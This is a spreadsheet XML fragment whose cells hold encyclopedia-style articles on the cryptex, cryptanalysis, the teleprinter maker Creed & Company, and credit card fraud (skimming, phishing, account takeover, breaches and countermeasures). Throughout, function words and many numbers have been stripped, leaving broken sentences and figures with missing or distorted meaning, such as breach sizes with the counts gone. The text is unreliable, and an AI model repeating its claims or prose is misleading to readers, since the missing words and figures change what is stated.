function like cryptexes, solved open secret weapon caches. they resemble providence three incomplete concentric rings directly must rotated none overlap symbol's pyramid. difficult pyramid lock puzzles, rotating ring certain direction cause rings rotate simultaneously. series episode british comedy panel game show taskmaster, comedian rose matafeo presents cryptex offering prize category "the thing that, found field, you'd most pleased about". trademark united states united states "cryptex" registered trademark justin kirk nevins. also combination lock wordlock, combination lock using letters instead numerals jefferson disk, cipher-encoding device mechanically similar cryptex references general references brown, (2003). vinci code, doubleday. vinci declassified, 2006 video documentary, written, directed produced david carr, david comtois, frankie glass. narrated jeff fischer. inline citations external links cryptex security boxes cryptex drive (long)/ cryptex drive (compass), round</t>
  </si>
  <si>
    <t>Cryptanalysis</t>
  </si>
  <si>
    <t>cryptanalysis (from greek kryptós, "hidden", analýein, analyze") refers process analyzing information systems order understand hidden aspects systems. cryptanalysis used breach cryptographic security systems gain access contents encrypted messages, even cryptographic unknown. addition mathematical analysis cryptographic algorithms, cryptanalysis includes study side-channel attacks target weaknesses cryptographic algorithms themselves, instead exploit weaknesses implementation. even though goal same, methods techniques cryptanalysis changed drastically history cryptography, adapting increasing cryptographic complexity, ranging pen-and-paper methods past, machines like british bombes colossus computers bletchley park world mathematically advanced computerized schemes present. methods breaking modern cryptosystems often involve solving carefully constructed problems pure mathematics, best-known integer factorization. overview encryption, confidential information (called "plaintext") sent securely recipient sender first converting unreadable form ("ciphertext") using encryption algorithm. ciphertext sent insecure channel recipient. recipient decrypts ciphertext applying inverse decryption algorithm, recovering plaintext. decrypt ciphertext, recipient requires secret knowledge sender, usually string letters, numbers, bits, called cryptographic key. concept even unauthorized person gets access ciphertext transmission, without secret cannot convert back plaintext. encryption used throughout history send important military, diplomatic commercial messages, today widely used computer networking protect email internet communication. goal cryptanalysis third party, cryptanalyst, gain much information possible original ("plaintext"), attempting “break” encryption read ciphertext learning secret future messages decrypted read. mathematical technique called “‘’cryptographic attack’’”cryptographic attacks characterized number ways: amount information available attacker attacks classified based type information attacker available. basic starting point normally assumed that, purposes analysis, general algorithm known; shannon's maxim "the enemy knows system" turn, equivalent kerckhoffs' principle. this reasonable assumption practice throughout history, countless examples secret algorithms falling wider knowledge, variously espionage, betrayal reverse engineering. (and occasion, ciphers broken pure deduction; example, german lorenz cipher japanese purple code, variety classical schemes): ciphertext-only: cryptanalyst access collection ciphertexts codetexts. known-plaintext: attacker ciphertexts know corresponding plaintext. chosen-plaintext (chosen-ciphertext): attacker obtain ciphertexts (plaintexts) corresponding arbitrary plaintexts (ciphertexts) choosing. adaptive chosen-plaintext: like chosen-plaintext attack, except attacker choose subsequent plaintexts based information learned previous encryptions, similarly adaptive chosen ciphertext attack. related-key attack: like chosen-plaintext attack, except attacker obtain ciphertexts encrypted different keys. keys unknown, relationship known; example, keys differ bit. computational resources required attacks also characterised resources require. those resources include: time number computation steps (e.g., test encryptions) must performed. memory amount storage required perform attack. data quantity type plaintexts ciphertexts required particular approach.it's sometimes difficult predict quantities precisely, especially attack practical actually implement testing. academic cryptanalysts tend provide least estimated order magnitude attacks' difficulty, saying, example, "sha-1 collisions 252."bruce schneier notes even computationally impractical attacks considered breaks: "breaking cipher simply means finding weakness cipher exploited complexity less brute force. never mind brute-force might require 2128 encryptions; attack requiring 2110 encryptions would considered break...simply put, break certificational weakness: evidence cipher perform advertised." partial breaks results cryptanalysis also vary usefulness. cryptographer lars knudsen (1998) classified various types attack block ciphers according amount quality secret information discovered: total break attacker deduces secret key. global deduction attacker discovers functionally equivalent algorithm encryption decryption, without learning key. instance (local) deduction attacker discovers additional plaintexts ciphertexts) previously known. information deduction attacker gains shannon information plaintexts ciphertexts) previously known. distinguishing algorithm attacker distinguish cipher random permutation.academic attacks often weakened versions cryptosystem, block cipher hash function rounds removed. many, all, attacks become exponentially difficult execute rounds added cryptosystem, possible full cryptosystem strong even though reduced-round variants weak. nonetheless, partial breaks come close breaking original cryptosystem mean full break follow; successful attacks des, md5, sha-1 preceded attacks weakened versions. academic cryptography, weakness break scheme usually defined quite conservatively: might require impractical amounts time, memory, known plaintexts. also might require attacker able things many real-world attackers can't: example, attacker need choose particular plaintexts encrypted even plaintexts encrypted using several keys related secret key. furthermore, might reveal small amount information, enough prove cryptosystem imperfect little useful real-world attackers. finally, attack might apply weakened version cryptographic tools, like reduced-round block cipher, step towards breaking full system. history cryptanalysis coevolved together cryptography, contest traced history cryptography—new ciphers designed replace broken designs, cryptanalytic techniques invented crack improved schemes. practice, viewed sides coin: secure cryptography requires design possible cryptanalysis. classical ciphers although actual word "cryptanalysis" relatively recent coined william friedman 1920), methods breaking codes ciphers much older. david kahn notes codebreakers arab scholars first people systematically document cryptanalytic methods.the first known recorded explanation cryptanalysis given al-kindi 801–873, also known "alkindus" europe), 9th-century arab polymath, risalah istikhraj al-mu'amma manuscript deciphering cryptographic messages). this treatise contains first description method frequency analysis. al-kindi thus regarded first codebreaker history. breakthrough work influenced al-khalil (717–786), wrote book cryptographic messages, contains first permutations combinations list possible arabic words without vowels.frequency analysis basic tool breaking classical ciphers. natural languages, certain letters alphabet appear often others; english, likely common letter sample plaintext. similarly, digraph "th" likely pair letters english, frequency analysis relies cipher failing hide statistics. example, simple substitution cipher (where letter simply replaced another), frequent letter ciphertext would likely candidate "e". frequency analysis cipher therefore relatively easy, provided ciphertext long enough give reasonably representative count letters alphabet contains.al-kindi's invention frequency analysis technique breaking monoalphabetic substitution ciphers significant cryptanalytic advance world al-kindi's risalah istikhraj al-mu'amma described first cryptanalytic techniques, including polyalphabetic ciphers, cipher classification, arabic phonetics syntax, importantly, gave first descriptions frequency analysis. also covered methods encipherments, cryptanalysis certain encipherments, statistical analysis letters letter combinations arabic. important contribution adlan (1187–1268) sample size frequency analysis.in europe, italian scholar giambattista della porta (1535–1615) author seminal work cryptanalysis, furtivis literarum notis.successful cryptanalysis undoubtedly influenced history; ability read presumed-secret thoughts plans others decisive advantage. example, england 1587, mary, queen scots tried executed treason result involvement three plots assassinate elizabeth england. plans came light coded correspondence fellow conspirators deciphered thomas phelippes. europe 15th 16th centuries, idea polyalphabetic substitution cipher developed, among others french diplomat blaise vigenère (1523–96). three centuries, vigenère cipher, uses repeating select different encryption alphabets rotation, considered completely secure chiffre indéchiffrable—"the indecipherable cipher"). nevertheless, charles babbage (1791–1871) later, independently, friedrich kasiski (1805–81) succeeded breaking cipher. during world inventors several countries developed rotor cipher machines arthur scherbius' enigma, attempt minimise repetition exploited break vigenère system. ciphers world world world breaking zimmermann telegram instrumental bringing united states war. world allies benefitted enormously joint success cryptanalysis german ciphers including enigma machine lorenz cipher japanese ciphers, particularly 'purple' jn-25. 'ultra' intelligence credited everything shortening european years, determining eventual result. pacific similarly helped 'magic' intelligence.cryptanalysis enemy messages played significant part allied victory world winterbotham, quoted western supreme allied commander, dwight eisenhower, war's describing ultra intelligence "decisive" allied victory. harry hinsley, official historian british intelligence world made similar assessment ultra, saying shortened less years probably four years"; moreover, said absence ultra, uncertain would ended.in practice, frequency analysis relies much linguistic knowledge statistics, ciphers became complex, mathematics became important cryptanalysis. this change particularly evident world efforts crack axis ciphers required levels mathematical sophistication. moreover, automation first applied cryptanalysis polish bomba device, british bombe, punched card equipment, colossus computers first electronic digital computers controlled program. indicator with reciprocal machine ciphers lorenz cipher enigma machine used nazi germany world message key. usually, transmitting operator informed receiving operator message transmitting plaintext and/or ciphertext enciphered message. this termed indicator, indicates receiving operator machine decipher message.poorly designed implemented indicator systems allowed first polish cryptographers british cryptographers bletchley park break enigma cipher system. similar poor indicator systems allowed british identify depths diagnosis lorenz sz40/42 cipher system, comprehensive breaking messages without cryptanalysts seeing cipher machine. depth sending messages insecure process. cryptanalyst messages said depth." this detected messages indicator sending operator informs receiving operator generator initial settings message.generally, cryptanalyst benefit lining identical enciphering operations among messages. example, vernam cipher enciphers bit-for-bit combining plaintext long using "exclusive operator, also known "modulo-2 addition" (symbolized plaintext ciphertextdeciphering combines bits ciphertext reconstruct plaintext: ciphertext plaintext(in modulo-2 arithmetic, addition subtraction.) when ciphertexts aligned depth, combining eliminates common key, leaving combination plaintexts: ciphertext1 ciphertext2 plaintext1 plaintext2the individual plaintexts worked linguistically trying probable words phrases), also known "cribs," various locations; correct guess, combined merged plaintext stream, produces intelligible text plaintext component: (plaintext1 plaintext2) plaintext1 plaintext2the recovered fragment second plaintext often extended directions, extra characters combined merged plaintext stream extend first plaintext. working back forth plaintexts, using intelligibility criterion check guesses, analyst recover much original plaintexts. (with plaintexts depth, analyst know corresponds ciphertext, practice large problem.) when recovered plaintext combined ciphertext, revealed: plaintext1 ciphertext1 keyknowledge allows analyst read messages encrypted key, knowledge related keys allow cryptanalysts diagnose system used constructing them. development modern cryptography governments long recognized potential benefits cryptanalysis intelligence, military diplomatic, established dedicated organizations devoted breaking codes ciphers nations, example, gchq nsa, organizations still active today. even though computation used great effect cryptanalysis lorenz cipher systems world also made possible methods cryptography orders magnitude complex ever before. taken whole, modern cryptography become much impervious cryptanalysis pen-and-paper systems past, seems upper hand pure cryptanalysis. historian david kahn notes: many cryptosystems offered hundreds commercial vendors today cannot broken known methods cryptanalysis. indeed, systems even chosen plaintext attack, selected plaintext matched ciphertext, cannot yield unlock[s] messages. sense, then, cryptanalysis dead. story. cryptanalysis dead, metaphors skin cat. kahn goes mention increased opportunities interception, bugging, side channel attacks, quantum computers replacements traditional means cryptanalysis. 2010, former technical director brian snow said academic government cryptographers "moving slowly forward mature field."however, postmortems cryptanalysis premature. while effectiveness cryptanalytic methods employed intelligence agencies remains unknown, many serious attacks academic practical cryptographic primitives published modern computer cryptography: block cipher madryga, proposed 1984 widely used, found susceptible ciphertext-only attacks 1998. feal-4, proposed replacement standard encryption algorithm widely used, demolished spate attacks academic community, many entirely practical. a5/1, a5/2, cmea, dect systems used mobile wireless phone technology broken hours, minutes even real-time using widely available computing equipment. brute-force keyspace search broken real-world ciphers applications, including single-des (see cracker), 40-bit "export-strength" cryptography, content scrambling system. 2001, wired equivalent privacy (wep), protocol used secure wi-fi wireless networks, shown breakable practice weakness cipher aspects design made related-key attacks practical. later replaced wi-fi protected access. 2008, researchers conducted proof-of-concept break using weaknesses hash function certificate issuer practices made possible exploit collision attacks hash functions. certificate issuers involved changed practices prevent attack repeated.thus, best modern ciphers resistant cryptanalysis enigma, cryptanalysis broader field information security remain quite active. symmetric ciphers boomerang attack brute-force attack davies' attack differential cryptanalysis impossible differential cryptanalysis improbable differential cryptanalysis integral cryptanalysis linear cryptanalysis meet-in-the-middle attack mod-n cryptanalysis related-key attack sandwich attack slide attack attack asymmetric ciphers asymmetric cryptography public-key cryptography) cryptography relies using (mathematically related) keys; private, public. such ciphers invariably rely "hard" mathematical problems basis security, obvious point attack develop methods solving problem. security two-key cryptography depends mathematical questions single-key cryptography generally not, conversely links cryptanalysis wider mathematical research way.asymmetric schemes designed around (conjectured) difficulty solving various mathematical problems. improved algorithm found solve problem, system weakened. example, security diffie–hellman exchange scheme depends difficulty calculating discrete logarithm. 1983, coppersmith found faster find discrete logarithms certain groups), thereby requiring cryptographers larger groups different types groups). rsa's security depends part) upon difficulty integer factorization breakthrough factoring would impact security rsa.in 1980, could factor difficult 50-digit number expense 1012 elementary computer operations. 1984 state factoring algorithms advanced point 75-digit number could factored 1012 operations. advances computing technology also meant operations could performed much faster, too. moore's predicts computer speeds continue increase. factoring techniques continue well, likely depend mathematical insight creativity, neither ever successfully predictable. 150-digit numbers kind used factored. effort greater above, unreasonable fast modern computers. start 21st century, 150-digit numbers longer considered large enough size rsa. numbers several hundred digits still considered hard factor 2005, though methods probably continue improve time, requiring size keep pace methods elliptic curve cryptography used.another distinguishing feature asymmetric schemes that, unlike attacks symmetric cryptosystems, cryptanalysis opportunity make knowledge gained public key. attacking cryptographic hash systems birthday attack hash function security summary rainbow table side-channel attacks black-bag cryptanalysis man-in-the-middle attack power analysis replay attack rubber-hose cryptanalysis timing analysis quantum computing applications cryptanalysis quantum computers, still early phases research, potential cryptanalysis. example, shor's algorithm could factor large numbers polynomial time, effect breaking commonly used forms public-key encryption.by using grover's algorithm quantum computer, brute-force search made quadratically faster. however, could countered doubling length. also economics security global surveillance information assurance, term information security often used government information security, overarching goal cryptography national cipher challenge security engineering, design applications protocols security vulnerability; vulnerabilities include cryptographic flaws topics cryptography zendian problem historic cryptanalysts conel hugh o'donel alexander charles babbage lambros callimahos joan clarke alastair denniston agnes meyer driscoll elizebeth friedman william friedman meredith gardner friedrich kasiski al-kindi dilly knox solomon kullback marian rejewski joseph rochefort, whose contributions affected outcome battle midway frank rowlett abraham sinkov giovanni soro, renaissance's first outstanding cryptanalyst john tiltman alan turing william tutte john wallis 17th-century english mathematician william stone weedon worked fredson bowers world herbert yardley references citations sources further reading bard, gregory (2009). algebraic cryptanalysis. springer. isbn 978-1-4419-1019-6. hinek, jason (2009). cryptanalysis variants. press. isbn 978-1-4200-7518-2. joux, antoine (2009). algorithmic cryptanalysis. press. isbn 978-1-4200-7002-6. junod, pascal; canteaut, anne (2011). advanced linear cryptanalysis block stream ciphers. press. isbn 978-1-60750-844-1. stamp, mark low, richard (2007). applied cryptanalysis: breaking ciphers real world. john wiley sons. isbn 978-0-470-11486-5.{{cite book}}: maint: uses authors parameter (link) swenson, christopher (2008). modern cryptanalysis: techniques advanced code breaking. john wiley sons. isbn 978-0-470-13593-8. wagstaff, samuel (2003). cryptanalysis number-theoretic ciphers. press. isbn 978-1-58488-153-7. external links basic cryptanalysis (files contain line header, removed first) distributed computing projects list tools cryptanalysis modern cryptography simon singh's crypto corner national museum computing ultraanvil tool attacking simple substitution ciphers alan turing cracked enigma code imperial museums</t>
  </si>
  <si>
    <t>Creed &amp; Company</t>
  </si>
  <si>
    <t>creed company british telecommunications company founded frederick george creed important pioneer field teleprinter machines. merged international telephone telegraph corporation (itt) 1928. history company founded frederick george creed danish telegraph engineer harald bille, first incorporated 1912 "creed, bille company limited". after bille's death railway accident 1916, name dropped company's title became simply creed company. company spent world producing high-quality instruments, manufacturing facilities limited time among items produced amplifiers, spark-gap transmitters, aircraft compasses, high-voltage generators, bomb release apparatus, fuses artillery shells bombs. 1924 creed entered teleprinter field model soon superseded improved model 1925 creed acquired patents donald murray's murray code, rationalised baudot code, used model tape teleprinter 1927. this machine printed received messages directly onto gummed paper tape rate words minute first combined start-stop transmitter-receiver teleprinter creed enter mass production. some models were: creed model (punched paper tape reader) creed model (page printing teleprinter introduced 1931) creed model baud page printing teleprinter) creed model (page printing teleprinter overlap range finder) creed model 7/tr (non-printing teleprinter reperforator) creed model (page printing teleprinter introduced 1954) creed model (page printing teleprinter introduced 1958) creed model (printing reperforator introduced 1948) creed model (printing reperforator using 7/8" wide tape) creed model (page printing teleprinter introduced 1966 type 15)in july 1928, creed company merged itt. during world creed company manufactured british typex machines, cipher devices similar german enigma machine. references external links creed company limited. first years history nova scotia creed company limited</t>
  </si>
  <si>
    <t>Credit card fraud</t>
  </si>
  <si>
    <t>credit card fraud inclusive term fraud committed using payment card, credit card debit card. purpose obtain goods services make payment another account, controlled criminal. payment card industry data security standard (pci dss) data security standard created help financial institutions process card payments securely reduce card fraud.credit card fraud authorised, genuine customer processes payment another account controlled criminal, unauthorised, account holder provide authorisation payment proceed transaction carried third party. 2018, unauthorised financial fraud losses across payment cards remote banking totalled £844.8 million united kingdom. whereas banks card companies prevented £1.66 billion unauthorised fraud 2018. that equivalent every attempted fraud stopped.credit card fraud occur unauthorized users gain access individual's credit card information order make purchases, transactions, open accounts. examples credit card fraud include account takeover fraud, account fraud, cloned cards, cards-not-present schemes. this unauthorized access occurs phishing, skimming, information sharing user, oftentimes unknowingly. however, type fraud detected means artificial intelligence machine learning well prevented issuers, institutions, individual cardholders. according 2021 annual report, americans experienced fraudulent charge credit debit cards, three credit debit card holders experienced fraud multiple times. this amounts million people victims credit card theft least once. regulators, card providers banks take considerable time effort collaborate investigators worldwide goal ensuring fraudsters successful. cardholders' money usually protected scammers regulations make card provider bank accountable. technology security measures behind credit cards continuously advancing, adding barriers fraudsters attempting steal money. means payment card fraud there kinds card fraud: card-present fraud (not common nowadays) card-not-present fraud (more common). compromise occur number ways usually occur without knowledge cardholder. internet made database security lapses particularly costly, cases, millions accounts compromised.stolen cards reported quickly cardholders, compromised account's details held fraudster months theft, making difficult identify source compromise. cardholder discover fraudulent receiving statement. cardholders mitigate fraud risk checking account frequently ensure suspicious unknown transactions.when credit card lost stolen, used illegal purchases holder notifies issuing bank bank puts block account. most banks free 24-hour telephone numbers encourage prompt reporting. still, possible thief make unauthorized purchases card card cancelled. prevention payment card fraud card information stored number formats. card numbers formally primary account number (pan) often embossed imprinted card, magnetic stripe back contains data machine-readable format. fields vary, common include name cardholder; card number; expiration date; verification code. europe canada, cards equipped chip requires digit entered merchant's terminal payment authorized. however, required online transactions. european countries, buyers using card without chip asked photo point sale. countries, credit card holder make contactless payment goods services tapping card rfid reader without need signature cost falls pre-determined limit. however, stolen credit debit card could used number smaller transactions prior fraudulent activity flagged. card issuers maintain several countermeasures, including software estimate probability fraud. example, large transaction occurring great distance cardholder's home might seem suspicious. merchant instructed call card issuer verification decline transaction, even hold card refuse return customer. detect credit card fraud using technology artificial computational intelligence given immense difficulty detecting credit card fraud, artificial computational intelligence developed order make machines attempt tasks humans already well. computation intelligence simply subset enabling intelligence changing environment. advances artificial computational intelligence, commonly used suggested ways detect credit card fraud rule induction techniques, decision trees, neural networks, support vector machines, logistic regression, meta heuristics. there many different approaches used detect credit card fraud. example, "suggest framework applied real time first outlier analysis made separately customer using self-organizing maps predictive algorithm utilized classify abnormal looking transactions." some problems arise detecting credit card fraud computational intelligence idea misclassifications false negatives/positives, well detecting fraud credit card larger available limit much prominent detecting fraud smaller available limit. algorithm helps detect sorts issues determined algorithm. this search technique brings upon improvement "neighbor solutions". another algorithm assists issues gass algorithm. gass, hybrid genetic algorithms scatter search. machine learning touching little difficulties credit card fraud detection, even advances learning technology every day, companies refuse share algorithms techniques outsiders. additionally, fraud transactions 0.01–0.05% daily transactions, making even difficult spot. machine learning similar artificial intelligence field statistics subdivision mathematics. with regards machine learning, goal find model yields highest level without overfitting time. overfitting means computer system memorized data transaction differs training way, likely misclassified, leading irritated cardholder victim fraud detected. popular programming used machine learning python, matlab. time, becoming increasing competitor well. through programs, easiest method used industry support vector machine. package function already programmed when support vector machines employed, efficient extract data. considered active research successfully solves classification issues well. playing major role machine learning, "excellent generalization performance wide range learning problems, handwritten digit recognition, classification pages face detection." also successful method lowers possibility overfitting dimensionality. types payment card fraud application fraud application fraud takes place person uses stolen fake documents open account another person's name. criminals steal fake documents utility bills bank statements build personal profile. when account opened using fake stolen documents, fraudster could withdraw cash obtain credit victim's name.application fraud also occur using synthetic identity similar fake documents mentioned above. synthetic identity personal information gathered many different identities create fake identity. once identity account established, fraudster different options take advantage bank. they maximize credit card spending spending much money possible credit card. many fraudsters credit card purchase items high resale value turn cash. account takeover account takeover refers fraudsters attempt assume control customer's account (i.e. credit cards, email, banks, card more). control account level offers high returns fraudsters. according forrester, risk-based authentication (rba) plays role risk mitigation.a fraudster uses parts victim's identity email address gain access financial accounts. this individual intercepts communication account keep victim blind threats. victims often first detect account takeover discover charges monthly statements authorize multiple questionable withdrawals. there increase number account takeovers since adoption technology, makes difficult fraudsters clone physical credit cards.among common methods fraudster commit account, takeover includes proxy-based "checker" one-click apps, brute-force botnet attacks, phishing, malware. other methods include dumpster diving find personal information discarded mail, outright buying lists 'fullz', slang term full packages identifying information sold black market.once logged fraudsters access account make purchases withdraw money bank accounts. they access information tied account, steal credit card numbers along social security numbers. they change passwords prevent victim accessing account. cybercriminals opportunity open accounts, utilize rewards benefits account, sell information hackers. social engineering fraud social engineering fraud occur criminal poses someone else results voluntary transfer money information fraudster. fraudsters turning sophisticated methods scamming people businesses money. common tactic sending spoof emails impersonating senior member staff trying deceive employees transferring money fraudulent bank account.fraudsters variety techniques order solicit personal information pretending bank payment processor. telephone phishing common social engineering technique gain trust victim. businesses protect dual authorisation process transfer funds requires authorisation least persons, call-back procedure previously established contact number, rather contact information included payment request. bank must refund unauthorised payment; however, refuse refund prove customer authorised transaction, prove customer fault acted deliberately, failed protect details allowed transaction. skimming skimming theft personal information used otherwise normal transaction. thief procure victim's card number using basic methods photocopying receipts advanced methods using small electronic device (skimmer) swipe store hundreds victims' card numbers. common scenarios skimming taxis, restaurants bars skimmer possession victim's payment card immediate view. thief also small keypad unobtrusively transcribe three four-digit card security code, present magnetic strip. call centers another area skimming easily occur. skimming also occur merchants third-party card-reading device installed either outside card-swiping terminal. this device allows thief capture customer's card information, including pin, card swipe.skimming difficult typical cardholder detect, given large enough sample, fairly easy card issuer detect. issuer collects list cardholders complained fraudulent transactions, uses data mining discover relationships among merchants use. sophisticated algorithms also search patterns fraud. merchants must ensure physical security terminals, penalties merchants severe compromised, ranging large fines issuer complete exclusion system, death blow businesses restaurants credit card transactions norm. instances skimming reported perpetrator card slot automated teller machine, device reads magnetic strip user unknowingly passes card these devices often used conjunction miniature camera read user's personal identification number time. this method used many parts world, including south america, argentina, europe. unexpected repeat billing online bill paying internet purchases utilizing bank account source repeat billing known "recurring bank charges". these standing orders banker's orders customer honour certain amount every month payee. with e-commerce, especially united states, vendor payee receive payment direct debit network. while many payments purchases valid, customer intentions bill monthly, known rogue automatic payments.another type credit card fraud targets utility customers. customers receive unsolicited in-person, telephone, electronic communication individuals claiming representatives utility companies. scammers alert customers utilities disconnected unless immediate payment made, usually involving reloadable debit card receive payment. sometimes scammers authentic-looking phone numbers graphics deceive victims. phishing phishing common methods used steal personal data. type cyber attack attacker acts credible person, institution, entity attempts lure victim accepting message taking action specific request. often, target attack receive email text message something would possibly want need hope tricking opening downloading message. during covid-19 pandemic, phishing rise world turned even virtual. give perspective, "researchers noted substantial spike 667% covid-19 phishing attacks first months pandemic.". also, given significance health care systems recent years health care companies main targets phishing attacks. these companies tons personal data stored extremely valuable attacker. information sharing information sharing transfer exchange data individuals, companies, organizations, technologies. advances technology, internet, networks accelerated growth information sharing. information spread shared matter seconds, accumulated digested speeds faster ever before. people often aware much sensitive personal information share every day. example, purchasing goods online, buyer's name, email address, home address, credit card information stored shared third parties track future purchases. organizations work hard keep individuals' personal information secure databases, sometimes hackers able compromise security gain access immense amount data. largest data breaches occurred discount retailer target. breach million shopper affected. specific case, hackers targeted point-of-sale system meaning "they either slipped malware terminals customers swipe credit cards, collected customer data route target credit card processors." single purchase register, masses personal data collected stolen major ramifications. financial infrastructure payment system continue work-in-progress constantly battle security hackers. regulation governance united states while federally mandated united states mandated payment card industry security standard council, composed major credit card brands maintains industry standard. some states incorporated standard laws. proposed toughening federal department justice announced september 2014 seek impose tougher combat overseas credit card trafficking. authorities current statute weak allows people countries avoid prosecution stay outside united states buying selling data pass illicit business u.s. department justice asks congress amend current would make illegal international criminal possess, sell stolen credit card issued u.s. bank independent geographic location. cardholder liability federal limits liability cardholders event theft actual credit card, regardless amount charged card, reported within days receiving statement. practice, many issuers waive small payment simply remove fraudulent charges customer's account customer signs affidavit confirming charges indeed fraudulent. physical card lost stolen, rather credit card account number stolen, federal guarantees cardholders zero liability credit card issuer. united kingdom credit cards regulated consumer credit 1974 (amended 2006). this provides number protections requirements. misuse card, unless deliberately criminal part cardholder, must refunded merchant card issuer. regulation banks united kingdom undertaken the: bank england (boe); prudential regulation authority (pra) division boe; financial conduct authority (fca) manages oversight. there specific legislation regulation governs credit card industry. however, association payment clearing services (apacs) institution settlement members part organisation works banking consolidation directive provide means transactions monitored regulated. finance association banking financial services sector, representing firms providing credit, banking payment-related services. australia australia, credit card fraud considered form identity crime. australian transaction reports analysis centre established standard definitions relation identity crime enforcement across australia: term identity encompasses identity natural persons (living deceased) identity bodies corporate identity fabrication describes creation fictitious identity identity manipulation describes alteration one's identity identity theft describes theft assumption pre-existing identity significant part thereof), without consent whether, case individual, person living deceased identity crime generic term describe activities/offences perpetrator uses fabricated identity, manipulated identity, stolen/assumed identity facilitate commission crime(s). losses estimates created attorney-general's department show identity crime costs australia upwards $1.6 billion year, majority $900 million lost individuals credit card fraud, identity theft scams. 2015, minister justice minister assisting prime minister counter-terrorism, michael keenan, released report identity crime misuse australia 2013–14. this report estimated total direct indirect cost identity crime closer billion, includes direct indirect losses experienced government agencies individuals, cost identity crimes recorded police. cardholder liability victim credit card fraud australia, still possession card, responsible anything bought without permission. however, subject terms conditions account. card reported physically stolen lost cardholder usually responsible transactions made them, unless shown cardholder acted dishonestly without reasonable care. vendors merchants prevent vendors "charged back" fraud transactions, merchants sign services offered visa mastercard called verified visa mastercard securecode, umbrella term secure. this requires consumers additional information confirm transaction.often enough online merchants take adequate measures protect websites fraud attacks, example blind sequencing. contrast automated product transactions, clerk overseeing "card present" authorization requests must approve customer's removal goods premises real time.if merchant loses payment, fees processing payment, currency conversion commissions, amount chargeback penalty. obvious reasons, many merchants take steps avoid chargebacks accepting suspicious transactions. this spawn collateral damage, merchant additionally loses legitimate sales incorrectly blocking legitimate transactions. mail order/telephone order (moto) merchants implementing agent-assisted automation allows call center agent collect credit card number personally identifiable information without ever seeing hearing this greatly reduces probability chargebacks increases likelihood fraudulent chargebacks overturned. famous credit fraud attacks between july 2005 mid-january 2007, breach systems companies exposed data 45.6 million credit cards. albert gonzalez accused ringleader group responsible thefts. august 2009 gonzalez also indicted biggest known credit card theft date information million credit debit cards stolen heartland payment systems, retailers 7-eleven hannaford brothers, unidentified companies.in 2012, million sets payment card information compromised hack adobe systems. information compromised included customer names, encrypted payment card numbers, expiration dates, information relating orders, chief security officer brad arkin said.in july 2013, press reports indicated four russians ukrainian indicted u.s. state jersey called "the largest hacking data breach scheme ever prosecuted united states." albert gonzalez also cited co-conspirator attack, least million credit card losses excess $300 million losses. attack affected american european companies including citigroup, nasdaq group, financial services group, visa licensee visa jordan, carrefour, jcpenney jetblue airways.between november 2013 december 2013, breach systems target corporation exposed data million credit cards. information stolen included names, account numbers, expiry dates, card security codes.from july october 2013, hacking attack compromised million sets payment card data stored computers neiman-marcus. malware system, designed hook cash registers monitor credit card authorisation process (ram-scraping malware), infiltrated target's systems exposed information many million customers.on september 2014, home depot confirmed payment systems compromised. they later released statement saying hackers obtained total million credit card numbers result breach.on 2016, coordinated attack, group around individuals used data 1600 south african credit cards steal us$12.7 million 1400 convenience stores tokyo within three hours. acting sunday another country bank issued cards, believed enough time leave japan heist discovered. countermeasures combat card payment fraud countermeasures combat credit card fraud include following. merchants truncation displaying full primary account number receipts tokenization (data security) using reference (token) card number rather real card number requesting additional information, pin, code, card security code performing geolocation validation, address reliance authentication, indirectly paypal, directly isignthis miicard. card issuers fraud detection prevention software analyzes patterns normal unusual behavior well individual transactions order flag likely fraud. profiles include information address. technologies existed since early 1990s detect potential fraud. early market entrant falcon; leading software solutions card fraud include actimize, sas, systems detica, ibm. fraud detection response business processes contacting cardholder request verification placing preventative controls/holds accounts victimized blocking card transactions verified cardholder investigating fraudulent activity strong authentication measures multi-factor authentication, verifying account accessed cardholder requirement additional information account number, pin, zip, challenge questions. there five main factors multi-factor authentication include:knowledge things user knows passwords answers secret questions. possession object user possession actual credit card. inherence biological trait user finger-print facial recognition. location user time authentication verify user card. time authentication taking place strange hour multiple times? multi possession-factor authentication, verifying account accessed cardholder requirement additional personal devices smart watch, smart phone challenge–response authentication out-of-band authentication, verifying transaction done cardholder "known" "trusted" communication channel text message, phone call, security token device industry collaboration information sharing known fraudsters emerging threat vectorsautomated data controls:the automated data controls used recognize unusual activity spending occur credit card. these controls used real time react "...to anything suspicious come upon, flow fraudulent activity stopped soon possible..." (johnston). three main ways automated data controls protect information includes: reconciliation verification ensure controls working properly. continuous monitoring alerting alerts cardholder/bank unusual activity taking place. reporting ensures organizations proper controls place prevent fraudulent activity banks financial institutions internal self-banking area customer carry transactions regardless weather conditions. access door: identifies every cardholder gains access designated area increases protection customers self-service procedures protects atms banking assets unauthorized usage protected area also monitored bank's cctv system cards chip identification passchip decrease possibility card skimming governmental regulatory bodies enacting consumer protection laws related card fraud performing regular examinations risk assessments credit card issuers publishing standards, guidance, guidelines protecting cardholder information monitoring fraudulent activity regulation, introduced sepa eu28 european central bank's 'secure pay' requirements payment services directive legislation. cardholders reporting lost stolen cards reviewing charges regularly reporting unauthorized transactions immediately keeping credit card within cardholder's view times, restaurants taxis installing virus protection software personal computers using caution using credit cards online purchases, especially non-trusted websites, make sure site reputable keeping record account numbers, expiration dates, phone number address company secure place. sending credit card information unencrypted email keeping written numbers credit card. giving credit card numbers information online sign transaction alerts card used aware phishing schemes disparities ethical dilemmas credit card fraud generation differences millennials biggest victims fraud, including credit debit card fraud, digital wallet, digital payment, banking fraud. followed genxers genzers. millennials spend time trying recover money lost fraudulent charges, disputing fraudulent charges, checking accounts fraudulent unusual activity generational groups. genzers experienced fraud often digital payment apps paypal, venmo square. generations experienced issues credit card fraud. baby boomers found lowest instances fraudulent charges, also spent least amount time trying recover money fraudulent charges dispute charges.racial differences "the federal trade commission ("ftc") consumer financial protection bureau ("cfpb") produced reports connection minority populations consumer issues. each report came conclusion: unfair deceptive practices unique disproportionate impacts communities color. these findings suggest needs done protect communities fraud." this, hackers specifically target communities color reasons need additional income credit, tendency certain types financial products. additional report findings: while black latino consumers likely experience fraud, latino communities predominantly underreport compared black white communities. latino black consumers report different rates fraud concerning distinct categories problem. found complaint database showed black, lesser extent latino, communities experience higher rates problems credit bureaus debt collections white communities. white latino communities experience higher rates impersonator scams black communities. also, according payment method data, black latino communities credit cards, accompanying legal protections, substantially lower rate white communities. additional technological features secure point point encryption strong authentication true link also references external links federal financial institutions examination council (ffiec) booklets information security appendix laws, regulations, guidance visa's fraud control basics merchants internet crime complaint center (ic3) partnership federal bureau investigation (fbi) national white collar crime center(nw3c). internet fraud, section "avoiding credit card fraud", federal bureau investigation website federal 